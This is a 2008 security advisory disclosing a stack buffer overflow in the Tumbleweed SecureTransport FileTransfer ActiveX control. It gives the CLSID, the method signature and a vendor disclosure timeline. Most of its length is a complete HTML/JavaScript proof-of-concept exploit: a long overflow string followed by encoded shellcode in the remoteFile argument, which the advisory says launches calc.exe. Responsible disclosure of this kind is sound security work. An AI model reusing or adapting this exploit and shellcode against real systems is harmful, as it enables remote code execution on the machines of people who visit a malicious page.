aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 07-Apr-2008 Software: Tumbleweed Communications - SecureTransport FileTransfer http://www.tumbleweed.com/ Description: "Tumbleweed SecureTransport is the industry's most secure Managed File Transfer solution for moving financial transactions, critical business files, large documents, XML, and EDI transactions over the Internet and private IP networks. The SecureTransport managed file transfer suite was built with security in mind from the ground up. SecureTransport provides corporate and government organizations with an enterprise-class managed file transfer service supporting a broad and flexible set of open Internet standards. Winner of the 2006 "Best Intellectual Property Protection" award from SC Magazine, SecureTransport securely manages file transfer at over 20,000 sites around the world. Financial networks use SecureTransport to move billions of dollars in financial transactions daily, and 8 of the top 10 U.S. banks use it to serve tens of thousands of corporate customers. Healthcare providers, payers, producers and clearing houses are linked through SecureTransport, which provides a single, integrated secure file transfer infrastructure for transferring private health information (PHI). And government agencies leverage SecureTransport to share sensitive documents with other agencies." Versions affected: SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English. Prior versions, and other language editions (vcst_*.dll), are assumed to be vulnerable. Vulnerability discovered: Buffer Overflow. Vulnerability impact: High - Remote code execution. Vulnerability information: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Tumbleweed Communications SecureTransport FileTransfer ActiveX Control. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. It may be possible to embed into HTML capable email clients. The specific flaw exists within the ActiveX control: DLL: vcst_en.dll CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3 interface IActiveXTransfer : IDispatch { [id(0x00000007), helpstring("method TransferFile")] HRESULT TransferFile( [in] VARIANT URL, [in] VARIANT hostName, [in] VARIANT localFile, [in] VARIANT remoteFile, [in] VARIANT fdxCookie, [in] long isSecure, [in] long isUpload, [in] int portNo, [in] long isAscii, [in] long shouldPerformMD5, [in] long isCheckpointRestart, [in] int serverPing, [out, retval] VARIANT* errBuffer); }; When a large value is specified for the 'remoteFile' parameter of the IActiveXTransfer.FileTransfer() method, a stack overflow occurs. Exploitation can result in code execution under the context of the current user. Other parameters, such as localFile, fdxCookie and localFile may also vulnerable. Examples: The following HTML will execute calc.exe under Windows 2000 Professional. <html> <object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3" id="Vulnerable"></object> <script language="javascript"> Vulnerable.TransferFile("a", "b", "c", "HqwToZjIhHkOZrLAyrUXkIEJkcQkiYRtePnECVUqpnlzkJTgBuGiqyLUCnceJkrsIxPXchp kjFjIgJRqGvniwwHJssGiTaPpmKZlBPwGMYhShxUWMCLuhgrpWXfdoWCCRYtDTrwyvDmfdAt dazeizBqexoCGifFzEKzvLENkrNCoqpQVtclDmpzPIJZTgUuSHWyiZoUWeNzrJFILdoEpKoy EptrZidLYuGbCrHxrMURRpdXyYJLzbeGRKqUOliWDHFdTEJOsGLngqOVVZdjzlCgOYbvSaUK cmQcugvmVQWMQVfudlFmPvrmULKPQDVGuVFxuhFbuazTlsGbYhuJIjKfPdzGdYKcGVmVFqrt RrzXIGrauMEauSvNfDQkfyQNOTNSwftDyRhKdBFyZHaKQDDrxIEoFyrNLjLPTTGTYNlkoWfP dgSqStnopGaGkwCujLqtocvbYJuTVbUJUJbsloqLClPXTklqPEOsthiraZgJzElMuXPuleJC QdcLsEbnalOGUpZsLgafPsjJEjUuIKAwjZWAaMLnVZwqMQeUYToFMBuneclybwZcKUjHMZhU aEayTKAqPlXGIcUbJVXOpiergIyJVEegVBsPObCFGjXBCgEYZYWfUKxzvVzWeJvhqDRksWeZ TWBRhMctQqFMuRHxuTifCqZUsVbILkcJNPUnbnsQHvxdmXMQdpHYTCiDBSwJUxmhKHRbYISv VGvburwysfdxiBPsDiHJJpBYnQpWdBQBwTrikbgybejtrQlBScWNsdHUxsaJpbKeamEbyjgA BESztoNphFXKFclPKGFfrDhBdQkPSxApusHVXwumGCVrfgNUDmOaGOAtHkoPzfDLAvtNaXPH WLaKCCUQAYdaAxALDrEcLZwGCXkOcgLVsSrJHAWMtpeAnplUkYhTizmWNyribnFjJAtCxHSJ sjAAiPbMTsmAVCioiIdvUVzEWpVJDfHQKGUAmmYqGUCfTXPyhkjcSyhBHOddRPvqWugerPbM MQlSllqNPquoytLBtvWbRyzAJddSxtzQaLATtYgibQzPeaMQzKIdpEJHPWSZyAkyaGkQJxCj gcrwQkBygMCsddYUdHifpbYdPgASxsPDjaTsArCJqosrCvrwHDKkUKjSaoJtbTaiJreoGjDW fDafPjrStaCeUQCVwiyvafEIcsbSvlCavYTHKSnyraoIuUcsWPSpCVHbWEYtwobKFQwvUjoC ZqdZEFoQzvosazdPVjXhYqdnDpPTSRapMmAuFXsixOKucVKZZKOBSnAPEzsBcWMGBnNRUVff kJSzESkzkgyKWHkQXIIVjWCeCqMXZtGtGRafPCRyQkZYjRpQOHisWHfdtOSyZHJapOYBLQpR MDyNrhnmFeZWWaWpcuMkfEnZPBbLJwCQloArgGKvsudOoLNFfJwaWZzvSUGKFaddKnMIpuWw XtLzGKmkCJrDZkohkHrbmZZVhFGLhAgLMbwNVPixPcBefTvfNJimVtYGXYPgHChbZLSgPwSY zlqCIpzOMBVSjGzgksrmKjAjlDRIhBBmELmUDMFSqHwWpxfEEWwjzObyFXZVGOMrrWqsWADb tweGtddyFNAIpqQqRzxmVUbjAbUxnDndqpKNDbWKpIHGAQuoGcufpEkjrbMecXBzSsKentBw SHkNDbPBkiZEvnQEKtFgIKCKDDBMsnxFLBKgyTYEIkZdLjxBpuWUHRmrAqeLZGrSYcHlmhEs DbctsVoimbXEJryOLpibDVzoGaxfuhjyDvcNWhvSfixmuJUlNWoeEJVpSVupoCcTCLteLmgl sHXIWOUXEWZURFNjdmnaxJPAAPaKtbTQkqyjqbgLsEZtZUQTbqXCzkpnCeKGbBvjiXJgnAbH GbowIAVKXRgcJXtkZLRuClxmJtSPfeIWyOUvaUGnXBQFJfbKwofltQJYldfKXbShFcfwumMW SgIOmiTzGofVNEuGOnkFnnzjKLJVXwAkxonTCeINNwkIDgoVZmjfnflgvWUToyMkVSuGAQhz DLSoeGtKuPHoPynBsdrVqPJcNksGiJmZWYsMZWoRIWsBTBwaSfOQlBjzmwqrGXdDBEeKSuwS ncGcwJyOnlCpOkXWcrBdfTncQfwLYfQPPWmlrLMPUZiOMcoxUmOSJbVzqbKlmgIjQcPABepT GFchsrdWijXbYxfLkIMxoTDRjfkRiytIvzFAfWuXfHrEVXoAuVZEDPqiTemWciTsSmKbwEtf MXkIVpDxKlFxRJHdaMdUrEZCJNkATqMnWcbAAEWPDNeWaPtGArUDpDPNkemRFZiEFLVqxaMd ZnWFvFtUrXYWnPjWNMdTuzsMFxnmMEtwVQEcaZHzIWvGfaNHKTgKroefyErvhZqAavhGLJFd IzbjnVXkJlfFEeWmfoTRFIYNtfIvIbjZNSsGMzjvZMYvfGwQDzmDdCLHDEMdkYdCluEwIXBG ugcOmrVhhTqhcJeWofypbnAvXsHNKwqDrWWWKYePeXkpInurLBiCAtqtVqiYOIzPUzNZcmEU yOaIWetBzEUpovdlaSXRFtJSHkXsLKglMsqETAcHvJZWcGEeelObuqCdWaYqPhfghqGfnYpE rsUIVSZQbiRpJNdoeHLXEFeqXBoMpnZTaJZchqHpkdocMEvdOEnhOzzueuOTwXrwEATaDaWJ pXZuLsCrYczknwyAphmUevgvZzQGOQzyrsPvIZZUGXqSwgRADPhvcfBMAGYmPGDDXPnEoOzA BADlDQGicETRIAmcRwsSvszWELcaseVabXOmGuBhpfOjhALMypkyCgyBDpFEwbnGYSXFiNqb OqUypiJiTrOthTyspQvMQawnagaFJWzgoxKWQpoHXFxRUWRcmtLHFLPakRPDxNiGliWQqtRB jKHnBAagKkuMQLLVuDLevjbkEhqGFFYylybFEyMvdnMaRdcucYrpaSNGesjkOYWczjffbJmh EWTgeYGPDKRHBuOmauGzNNKCXhOAOqhxdHQAdfQEffPDBrvGiEodtTDIXeDdsOXcmMrdMJdx nbZFiuVRFNioshyrXTVodBxaFXYBbwfVwcUSJXGdZZAnYMEhVtPEZYUUBeRJDZKFCrRuJQdL tkKakwFLEQXTcOUcjFPolJLWtJvXenczUxRbGZRINYXWUzzcHJNryYMOCHNZsrfloSffZWtg LJXudLeRYwbukvxEMcMwXAYiXChqgVXDeXDMvfowmLZSwkHjTLtIRFnmGFArnVllqfjiOnXP dZjaIxugozJjVcoVZnExzQxhxPrciIeSjJMBImjHfsHyoigqknpsAoNGpGqRSEVegZQXQlVQ yNmewfOjiZCwTWOdSRCwnzQczqnWyeXTIzzukwVKkDAsStGbrCwYYFQqnlBheQVFhGfgwKSC cQSqixNGSPeVobgJLiNftjLqycVBbSUphUqoxxstwQUdAVkQfyoKUAKWgEJycUHyHRPoVbnT TVHvrGnwzlPAvDsThykmjHmaWLblFsSPlHrsBJTvHWAmJViArtMgJZaTbPARfcnHAlorGuby ovlnCfyQArosOILFrXKHupmHusRIoQgDZzyZHsCZhNoOnHWnUsUGFeqYsLILkSwnvHsuOlYG jhIfMhwqmcaIMQaqFFkhABUEXzKyKYSQyOTyrFfqIlIkNvLxriALuQsbamSphbypAADfqgXj xtFKzlXCuuCovaozBjtrqjyRqEJTLoLWXSJUzayhZYomKFzYBfKYzGodrrIXemRZZRwDXyfC LVxmmdLOvwSCTjtsETodToQLvjrUkHUQktaQZvODJrtRgmEuFYDvPIcmynnHzAVroXUfFIvU szIyeJVaWogcLPDKuLTPmCWZEOWpyQeDUjhiyZHtjMEBnGYjYpnFeiAlaqfziytMiSAUmXpK zJEdIPWNdMKsjilgDITudqqCoHrsQDGUBIbxtHCJRzPIQuthMmhiaJSvncBzVNuDDIJFXvyS SKUOlkFdEbbvvQYMRoFgGurkUAWbiczranFEsZzPYlUJKsAeFJOXPVmthxTdmgQWCzscNuhC NfRnOZFXwUOdGmHGhBijSrytzjNJiwDyNNlYmQbrjSSPvDgOdEGZNbKEkhyoboqmlzQUvEhr SrEAuKduQGvOyrVgCvrhmzXQjHsoQrkRMIgFNhqvMncLHcauYYPVcZNescGfqSPeFODxhzUk alkFRrMpnptBHYTZXVEgINvieNxFeJIVYRJaEsJOwDEkXaUxvuHQgUSjyVxoXfxjzNTXehTu keQAosgTtbaTswUhSSxGmytLAxAUYmLpcNOWqvHWgiJhfduWtwALnUZoiGZIlKhbnHZmGLWj fgMDLbNJKNJAJufWHQDDdBNZsXXiFzgADlSniUqBjVQBNmCEDuciGDgnpNqXRGfdrPfMeFBs UHvwPYNfguoTgJoAUVCsfsXKXqbUOVaTbvWzaLFIiBodrzFvgzkejRwlBvdoDjvRUegEepep XqzHopUAAzvHgnacEwmXoZkmYmxKNJFoxekgijRWXRJteBBqwpPSrUVlSiHHPqBvipxhCaLQ lumwzvoFnQNHKzYnAFWcjqfsLzjjbIEBzRyMvTVSdQSoYhHzOUXgUERmDofuFOqzngpykPjh MpQElnoUzqwzH?? !????* uTX?&#157;????p?]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTE PC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJD MEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP 1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJ GBCCQBLBCEPAA", "d", false, false, 80, false, true, true, 420) </script> </html> Additionally, a Metasploit Framework Module has been written to demonstrate the vulnerability. References: aushack.com advisory http://www.aushack.com/200708-tumbleweed.txt Credit: Patrick Webster ( patrick (at) aushack (dot) com [email concealed] ) Disclosure timeline: 13-Aug-2007 - Discovered during quick audit. 14-Aug-2007 - Metasploit module developed. 22-Aug-2007 - Notified vendor. 19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix 20. 07-Apr-2008 - Disclosure. EOF